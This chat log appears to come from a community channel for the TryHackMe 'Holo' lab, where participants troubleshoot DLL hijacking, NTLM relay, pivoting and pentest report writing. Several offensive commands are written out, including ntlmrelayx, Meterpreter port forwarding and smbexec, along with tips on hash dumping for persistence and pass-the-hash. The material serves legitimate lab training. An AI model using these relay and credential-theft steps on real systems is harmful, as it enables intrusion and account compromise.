the pictures in the tryhackme page actually says the name of the vulnerable application

the next part is figuring out where it is

im still stuck in the part of hijacking, tried running the binary locally and renamed my dll multiple times to the different missing dll names and still cant pop the covenant :/

The FILESRV01?

I am still lost on this part

oh yea , i meant finding which directory does the vulnerable application reside in

Any pointers?

if u got the name of the vulnerable application, u can do a simple windows find based on that name

tree /f

good command

oh right that

just dont do that in the root of a filesystem

lel

:X im kidding i kinda bumped into it manually

iirc it's in a desktop

TLDR, You need root to see the scheduled task. You can find the application by some basic file enumeration

I got the application but how do I know that it is the one?

Like I can gather it from the hints

research, testing

approach it as you would any other application you dont know what it is

You know its vulnerable because we have presented it in such a way

but approach it as you would anything else, research it see if it has any low hanging fruit, test it see if you can find any vulnerabilities, etc.

Nah I meant that how would I know that this is being run as a scheduled task if I cannot see all the scheduled task without being admin?

Okay

TLDR: the scheduled task is automation

in the real world a user would click the application

the scheduled task is emulating the "user"

However, I believe the scheduled task question comes before the DLL task which is an oversight on my part. I need to look at it on my free time and see what I can do to fix it

I used the powerview script to enumerate the Scheduled tasks but this application wasn't listed there

Also, how would you put this bit in a pentest report?

Yes, because you don’t have the permission level to see it

There are various ways but TLDR found vulnerable application allowing privilege escalation via DLL Hijacking

you could then provide references, remediation, etc

Okay thanks @lone spruce 😄

Gave +1 Rep to @lone spruce

just an fyi for anyone participating - currently no one has submitted a report

odds of winning are 1/1

Imma try my best to create a report which is good enough. I have never really written pentest reports. Does obsidian work?

Obsidian, Open Office, whatever you want as long as it looks presentable

here's a sample report from OffSec. This is a good feel of how a report should be structured and look as a final product

Thanks @wind bobcat. I'll be right at it once I compromise this last machine. A Pen-300 would be a real pain off my student debt xD

Gave +1 Rep to @wind bobcat

When's the deadline though?

For the Pen-300?

It’s specified in the task

Here’s another good reference in case anyone wants to write a report but isn’t sure where to start https://github.com/juliocesarfort/public-pentesting-reports

any tips to get the SMB connection after having started the NTLMrelayX? Can't seem to be getting anything :/

where exactly are you stuck? what have you tried? What exactly are you experiencing. Try to be as detailed and as verbose as possible

On PC-FILESRV01, I've disabled and stopped both lanmanserver and lanmanworkstation and rebooted. Verified that the port was closed and the service no longer runs.
I also have a meterpreter connection to PC-FILESRV01
I did portfwding via this session using portfwd add -R -L 0.0.0.0 -l 445 -p 445 (command from the room page)
I ran the autoroute module to add 10.200.168.0/24 to my msf's routing table and also ran the socks_proxy module on my machine port 9050, with version set to 4a. This is so that I can reach the DC using proxychains. Verfied that I can reach the DC.
Configured my proxychains with only this: socks4 127.0.0.1 9050 so that I can the socks proxy I configured.
Started my NTLMrelayX by doing: proxychains ntlmrelayx.py -t smb://10.200.168.30 -smb2support -socks
Currently waited for quite a while, still no response :/

you started running NTLMRelayX before adding the port forward, right?

err after

i've experiemented and it seems like it has to be done before

In Task 46 the Syntax is given as sudo python [Responder.py](<http://responder.py/>) -I <Interface>. Wont it be http://IP/?

@lone spruce did you change that?

it wouldn't be either

task has been updated

Okay thanks

Am on it right now 😄

nah, wasn't me. I genuinely am wondering if someone is else is messing with things because I swear this isn't the first time something has just been changed or moved without any of us knowing

hmm still didn't work

if you open Wireshark on PC-FILESRV01, do you see inbound SMB requests?

there was no inbound SMB requests

Just resetted

you should see responses every minute or so

So, in the syntax ntlmrelayx.py -t ldap://<IP> -smb2support --escalate-user <user> I put in the IP of DC-SRV01(which has the SMB port open) and the user ||watamet|| but it keeps erroring out. Any reasons why? (I am doing this on my attack box while I have Responder running)

the command you have there was a demo

Aah get it

Thanks man.

next task has the actual commands

Almost there. Hopefully the stupid questions would stop soon.

hmm I just restarted the network and after getting shell on FILESRV, i opened wireshark on FILESRV and still saw no SMB connections

Can I check which IP is performing the SMB connections ?

When it says restart the network what does it exactly signify? Restart the whole network or just the DC

Just go shutdown /r?

When the network resets, it physically resets all the machines back to the AMI we provided THM

when it says restart, it means restart PC-FILESRV01

there should definitely be inbound SMB requests coming from S-SRV02, I think the best advice I can give is reset the network

I did shutdown /r on PC-FILESRV01 and am waiting

I feel like I am a Morty here

https://tenor.com/view/rick-and-morty-puzzled-umm-uhh-speechless-gif-12582727

i takes a minute i think

$ proxychains smbexec.py -no-pass HOLOLIVE/SRV-ADMIN@10.200.114.30
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/libproxychains4.so
[proxychains] DLL init: proxychains-ng 4.15
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

[proxychains] Dynamic chain  ...  127.0.0.1:1080  ...  10.200.114.30:445 <--denied
[-] [Errno Connection error (10.200.114.30:445)] [Errno 111] Connection refused

😦

The last hurdle

Also [-] SOCKS: Don't have a relay for 10.200.114.30(445)

you can access 10.200.114.30, right?

without having to proxy any traffic through anything?

I personally recommend using sshuttle over chisel for this bit

I have sshuttle running

and in ntlmrelayx, if you run socks do you see a session?

This is what I'm getting

But I get this in responder as well:

[*] [LLMNR]  Poisoned answer sent to 10.50.111.6 for name tun0
[*] [LLMNR]  Poisoned answer sent to 10.50.111.6 for name tun0
[*] [LLMNR]  Poisoned answer sent to 10.50.111.6 for name tun0

You don't need responder running.

you just need to follow tasks 47/48

I did that :))

and you still have responder running, which is an issue and not at all required

in the NTLMrlRelayX console, do you see any inbound sessions?

Not really, just this message

it should look like so

Not really

Okay wait, I am getting an error

I'd you don't see that, then I'd recommend restarting PC-FILESRV01, Start NTLMRelayX, and after that is setup, pop a Meterpreter shell and portforward.

If that doesn't work, my suggestion is restart the network

This error in between is sus

I got rid of the error

it says the problem

address already in use

Yeah, I had a server hosted

I set up portforwarding using meterpreter with portfwd add -R -L tun0 -l 445 -p 445

it must be 0.0.0.0

That must be it

Yippppeeeeee got it

good thing you mentioned it, haha :p

Had to reset the network

Gotta go back to hijacking dlls

side note

the local admin hashes are the same

so if you dump hashes, you'll have persistence

Wait, so after getting rdp on PC-FILESRV01 using ||watanot's creds||, and getting Admin, I dump the hashes

yep, then you can regain access to FILESRV01 with ps/smbexec

Also, when you say local admin hashes are same, you mean the local admin and watanot's hashes?

ye

So correct me if I am wrong, I can then technically directly gain access to Admin using watanot's NTLM hash?

I'm sorry, my windows is weak

im stuck on the same thing when i try to psexec i get " Errno Connection error (10.200.133.30:445)] [Errno 111] Connection refused "

with the Administrator hash, not watamet

Aah sweet. Got it.

Just that last flag

if you try smbclient -L //10.200.133.30/, do you get a connection refused, aslo?

Also, if we have sshuttle running, do we need meterpreter portfwd?

yes

yep i do

the reason for the portfoward:
You're listening to traffic coming in on PC-FILESRV01 port 445 and redirecting it to your local port 445

that's a problem. How are you pivoting into 10.200.133.0/24?

chisel

so you'd need 2 proxychains

1 config file for pivoting into the LAN

2 config file for NTLM Relay

which is why I recommend sshuttle

oh my

https://tenor.com/view/facepalm-really-stressed-mad-angry-gif-16109475

ok ok thanks a lot

New Error 🙂

[-] Authenticated as Guest. Aborting
[*] Opening SVCManager on 10.200.114.30.....
[-] Error performing the uninstallation, cleaning up

:))

Nvm, smbexec.py did the job

Finally!

congratulations dude ! im still fighting

You'll get there king.

It's report time

Just two report related questions: Is it bad practice to copy the verbatim of the Offsec report and are diagrams required?

Diagrams not required

i'll say use your best judgement on the offsec report

do what you'd do irl.

I WANT DIAGRAMS

booooo

https://tenor.com/view/thumbs-down-you-adam-sandler-gif-14612875

Nice one!

I'd need some advice on task 28. The text says "Now that we have successful authentication to the web app we know that we have an upload page" but I can't get to a working web app on S-SRV01 except a login page .. Is it me or there's something wrong with the instance ?

were you able to reset the password?

No, but thanks for the hint

Gave +1 Rep to @wind bobcat

The login page is the web app

you need to bypass the login page

Wait what the heck

why is that flipped around

@wind bobcat someone is definitely messing with things because those tasks are flipped for some odd reason

also I just went to fix the scheduled task bit. Did you already delete that question?

👀

Any hints on how to find vulnerable application?

Just do some manual enumeration it’s pretty obvious once you find it

u get a reset every hour ig?

Hey, when enumerating the network initially, I see this 10.200.x.250 host up. What exactly is this?

thm infra

What's that?

I'm just curious

see following 3 messages, got the same question before
#holo-network message

Aah thanks man :D

And sorry for being repetitive

Everything is working fine proxies ntlmrelayx etc... but secretsdump gives me The attempted logon is invalid

i tried cracking Administrators hash but i get exhausted, i used the net user stuff

but i always get invalid logon

this thing gonna drive me crazy

Have you added the new user -and in the Admin group- with psexec/smbexec? Have you checked if the user is added or add another admin user?

i cant add them with psexec i get STATUS_LOGON_FAILURE

Try smbexec as alternative, without an admin user secretdump want work. You don’t need to crack the admin hash , for evil-winrm ,.. you can use the hash..

a yes also, i cant login in with evilwinrm

tried that

With the domain admin hash you can, that’s why we run secretdump…

technically and theoretically yes but for some reason it will not let me, i will reset the network somethings going wrong

i dunno

thanks for your time

hello on google colab task for password cracking does it cost anything to use it?

no

@wind bobcat @lone spruce can I DM anyone regarding the report?

Just some stupid formatting questions

is it safe to auth to this app?

Go for it

Yeah 28 and 29 were flipped. It's fixed now and it makes way more sense

It’s an official google product, yes

Regarding the PEN-300 prize, is it possible for the winner to swap it for something equivalent? Like AWAE ?

or a thm sub for 9-10 years xD

😂

I would imagine you can’t

I see, thanks for clarifying!

Can Anyone Help Me? IDK whats wrong

Do we need to install both dotnet-sdk and runtime or just SDK??

Try apt install libicu63, it should provide the ICU support
Or there should be a configuration file to set the said System.Globalization.Invariant to true

The error is perhaps caused due to system locale conversion or translations methods not available.

Thanks Cry :D

Gave +1 Rep to @lone spruce

we can certainly talk about substitution. Afaik, no voucher has been purchased yet

but we'll cross that bridge when it comes to it

I understand, thanks !

Exepct for the john and hashcat part, the holo network could be done with a raspberry?

I don't see why not

Only need patience, to install packages and covenant.

Thanks to the creators of “Holo”, an excellent lab that I really enjoyed, especially the attack vectors of “DLL Hijacking” and “remote NTLM relay”, just thank you!